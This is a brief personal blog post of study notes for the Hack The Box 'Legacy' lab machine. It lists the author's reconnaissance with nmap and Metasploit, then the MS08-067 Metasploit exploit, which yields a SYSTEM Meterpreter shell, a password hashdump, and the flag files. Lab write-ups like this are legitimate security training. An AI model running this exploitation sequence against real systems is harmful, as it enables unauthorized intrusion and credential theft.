TCM PEH Hacking Legacy Notes

on March 11, 2021 under certs

1 minute read

HTB Legacy

I’m just gonna record his commands to derive methodology

nmap -A -T4 -p- 10.10.10.4
Noted port 139
Noted port 445
Noted Windows XP OS
Noted smb-security-mode

smbclient -L \\10.10.10.4\
enter
dead end

msfconsole
search smb_version
use auxiliary/scanner/smb/smb_version
options
set rhost 10.10.10.4
options
exploit
Noted Windows XP SP3

Googled Windows XP SP3 exploit
Opened exploit-db link
Opened rapid7 link
Note MS08-067 at rapid7 link is a metasploit module

use exploit/windows/smb/ms08_067_netapi
options
set rhost 10.10.10.4
show targets
exploit
Meterpreter session 1 opened
getuid
Noted NT SYSTEM
sysinfo
Noted x86 matches x86 Meterpreter shell
hashdump
shell
cd “c:\documents and settings”
cd john\desktop
type user.txt
cd …\Administrator\desktop
type root.txt
ctrl+c
ctrl+c

htb, certs

I feedback.
Let me know what you think of this article on twitter @cpardue09 or leave a comment below!